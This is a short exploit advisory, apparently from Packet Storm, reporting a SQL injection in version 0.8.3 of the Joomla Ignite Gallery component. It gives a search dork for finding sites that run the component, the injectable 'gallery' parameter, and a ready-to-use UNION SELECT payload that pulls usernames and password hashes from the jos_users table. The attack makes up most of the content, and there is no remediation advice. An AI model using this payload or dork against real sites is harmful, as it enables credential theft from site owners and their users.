Joomla Ignite Gallery 0.8.3 SQL Injection

2008-10-11T00:00:00
ID PACKETSTORM:70826
Type packetstorm
Reporter Valon Kerolli
Modified 2008-10-11T00:00:00

Description

                                        
                                            `#############################################################################  
# #  
# Joomla Component Ignite Gallery SQL Injection Vulnerability #  
# #  
#############################################################################  
  
  
########################################  
  
[~] Vulnerability found by: Valon Kerolli  
[~] Contact: valon[at]itshqip.com  
[~] Site: www.itshqip.com  
  
########################################  
  
[~] ScriptName: "Joomla"  
[~] Component: "Ignite Gallery (com_ignitegallery)"  
[~] Version: "0.8.3"   
[~] Author: "Matt Thomson"  
[~] Author E-mail: "matt@ignitejoomlaextensions.com"  
[~] Author URL: "www.ignitejoomlaextensions.com"  
  
########################################  
  
[~] DORK: inurl:"com_ignitegallery"  
  
########################################  
  
[~] Exploit: /index.php?option=com_ignitegallery&task=view&gallery=[SQL]&Itemid=18  
[~] Example: /index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10+from+jos_users--&Itemid=18  
  
########################################  
  
`